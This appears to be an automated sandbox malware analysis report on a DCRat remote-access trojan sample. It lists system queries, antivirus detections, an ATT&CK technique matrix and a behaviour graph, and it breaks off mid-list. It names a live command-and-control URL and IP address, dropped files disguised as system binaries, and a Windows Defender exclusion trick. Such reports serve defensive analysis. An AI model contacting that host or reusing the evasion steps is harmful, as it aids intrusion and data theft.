                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe VolumeInformation
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: CPNSQusnwC.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.CPNSQusnwC.exe.9d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CPNSQusnwC.exe PID: 1416, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: CPNSQusnwC.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.CPNSQusnwC.exe.9d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2115602177.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: CPNSQusnwC.exe PID: 1416, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts141
                    Windows Management Instrumentation                    		1
                    Scripting                    		111
                    Process Injection                    		111
                    Masquerading                    		OS Credential Dumping33
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Application Layer Protocol                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                    Virtualization/Sandbox Evasion                    		Security Account Manager251
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Software Packing                    		DCSync2
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc Filesystem135
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574710 Sample: CPNSQusnwC.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Antivirus detection for dropped file 2->87 89 15 other signatures 2->89 9 CPNSQusnwC.exe 4 46 2->9         started        process3 file4 73 C:\Users\user\Desktop\zJHvHEBf.log, PE32 9->73 dropped 75 C:\Users\user\Desktop\xQsMWHQg.log, PE32 9->75 dropped 77 C:\Users\user\Desktop\vEieQmso.log, PE32 9->77 dropped 79 32 other malicious files 9->79 dropped 99 Adds a directory exclusion to Windows Defender 9->99 101 Drops PE files with benign system names 9->101 13 cmd.exe 9->13         started        16 powershell.exe 23 9->16         started        18 powershell.exe 23 9->18         started        20 11 other processes 9->20 signatures5 process6 signatures7 103 Uses ping.exe to sleep 13->103 105 Uses ping.exe to check the status of other devices and networks 13->105 22 explorer.exe 13->22         started        27 conhost.exe 13->27         started        39 2 other processes 13->39 107 Loading BitLocker PowerShell Module 16->107 29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        35 conhost.exe 20->35         started        37 conhost.exe 20->37         started        41 7 other processes 20->41 process8 dnsIp9 81 45.88.91.89, 49753, 49758, 49763 LVLT-10753US Bulgaria 22->81 65 C:\Users\user\Desktop\ySVMqwBm.log, PE32 22->65 dropped 67 C:\Users\user\Desktop\wdeWzfMx.log, PE32 22->67 dropped 69 C:\Users\user\Desktop\uaPNCQpm.log, PE32 22->69 dropped 71 22 other malicious files 22->71 dropped 91 Antivirus detection for dropped file 22->91 93 System process connects to network (likely due to code injection or exploit) 22->93 95 Multi AV Scanner detection for dropped file 22->95 97 4 other signatures 22->97 43 powershell.exe 22->43         started        45 powershell.exe 22->45         started        47 powershell.exe 22->47         started        49 9 other processes 22->49 file10 signatures11 process12 process13 51 conhost.exe 43->51         started        53 conhost.exe 45->53         started        55 conhost.exe 47->55         started        57 conhost.exe 49->57         started        59 conhost.exe 49->59         started        61 conhost.exe 49->61         started        63 5 other processes 49->63

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    CPNSQusnwC.exe76%ReversingLabsByteCode-MSIL.Trojan.Mardom
                    CPNSQusnwC.exe100%AviraHEUR/AGEN.1309961
                    CPNSQusnwC.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe100%AviraHEUR/AGEN.1309961
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe100%AviraHEUR/AGEN.1309961
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe100%AviraHEUR/AGEN.1309961
                    C:\Recovery\conhost.exe100%AviraHEUR/AGEN.1309961
                    C:\Recovery\conhost.exe100%AviraHEUR/AGEN.1309961
                    C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe100%Joe Sandbox ML
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe100%Joe Sandbox ML
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe100%Joe Sandbox ML
                    C:\Recovery\conhost.exe100%Joe Sandbox ML
                    C:\Recovery\conhost.exe100%Joe Sandbox ML
                    C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe76%ReversingLabsByteCode-MSIL.Trojan.Mardom
                    C:\Recovery\conhost.exe76%ReversingLabsByteCode-MSIL.Trojan.Mardom
                    C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe76%ReversingLabsByteCode-MSIL.Trojan.Mardom
                    C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe76%ReversingLabsByteCode-MSIL.Trojan.Mardom
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exe76%ReversingLabsByteCode-MSIL.Trojan.Mardom
                    C:\Users\user\Desktop\AxLDtRxd.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\CxYvgXXc.log8%ReversingLabs
                    C:\Users\user\Desktop\DiqTAfIW.log25%ReversingLabs
                    C:\Users\user\Desktop\DrOTkRbS.log3%ReversingLabs
                    C:\Users\user\Desktop\ELylTcFa.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                    C:\Users\user\Desktop\FBkUkkGT.log29%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\FZhLDyOY.log29%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\Desktop\FnPmnTXV.log21%ReversingLabs
                    C:\Users\user\Desktop\GWITZydS.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\GzLcGkVO.log17%ReversingLabs
                    C:\Users\user\Desktop\HzZUtpuN.log29%ReversingLabs
                    C:\Users\user\Desktop\LmdbigkC.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\QhesqMaw.log21%ReversingLabs
                    C:\Users\user\Desktop\QwEjYoPD.log4%ReversingLabs
                    C:\Users\user\Desktop\SSKIxalp.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\SVwsOfwt.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\TkfSyAEq.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                    C:\Users\user\Desktop\TmvagkQx.log25%ReversingLabs
                    C:\Users\user\Desktop\TvSaQXjt.log17%ReversingLabs
                    C:\Users\user\Desktop\UJAAAsrr.log17%ReversingLabs
                    C:\Users\user\Desktop\UOyjNWIs.log12%ReversingLabs
                    C:\Users\user\Desktop\UPlQSaAj.log8%ReversingLabs
                    C:\Users\user\Desktop\WJAzEWli.log4%ReversingLabs
                    C:\Users\user\Desktop\aIOpvFFY.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                    C:\Users\user\Desktop\bqhiOmsd.log5%ReversingLabs
                    C:\Users\user\Desktop\bvfQbQIf.log21%ReversingLabs
                    C:\Users\user\Desktop\cSkqvYkZ.log17%ReversingLabs
                    C:\Users\user\Desktop\dGozhlgX.log8%ReversingLabs
                    C:\Users\user\Desktop\eJSyBaRc.log16%ReversingLabs
                    C:\Users\user\Desktop\ejwQzjeb.log3%ReversingLabs
                    C:\Users\user\Desktop\fJbhCUkS.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\gljzVSiX.log25%ReversingLabs
                    C:\Users\user\Desktop\hovXJzGK.log5%ReversingLabs
                    C:\Users\user\Desktop\jWOPcftP.log8%ReversingLabs
                    C:\Users\user\Desktop\liYyiBRH.log8%ReversingLabs
                    C:\Users\user\Desktop\nDhGzpaM.log8%ReversingLabs
                    C:\Users\user\Desktop\nTDOpObA.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\pxxplmMK.log25%ReversingLabs
                    C:\Users\user\Desktop\qVqwKxgw.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\sUqvPban.log29%ReversingLabs
                    C:\Users\user\Desktop\scaNtKAs.log25%ReversingLabs
                    C:\Users\user\Desktop\tQeVfYwq.log8%ReversingLabs
                    C:\Users\user\Desktop\uNFeAYLl.log17%ReversingLabs
                    C:\Users\user\Desktop\uaPNCQpm.log17%ReversingLabs
                    C:\Users\user\Desktop\ufMwPuFo.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                    C:\Users\user\Desktop\vEieQmso.log16%ReversingLabs
                    C:\Users\user\Desktop\wdeWzfMx.log21%ReversingLabs
                    C:\Users\user\Desktop\xQsMWHQg.log8%ReversingLabs
                    C:\Users\user\Desktop\ySVMqwBm.log12%ReversingLabs
                    C:\Users\user\Desktop\zJHvHEBf.log25%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://45.88.91.89/Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.phptrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2499619522.000001B700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE67101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760A9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B224D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE347F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 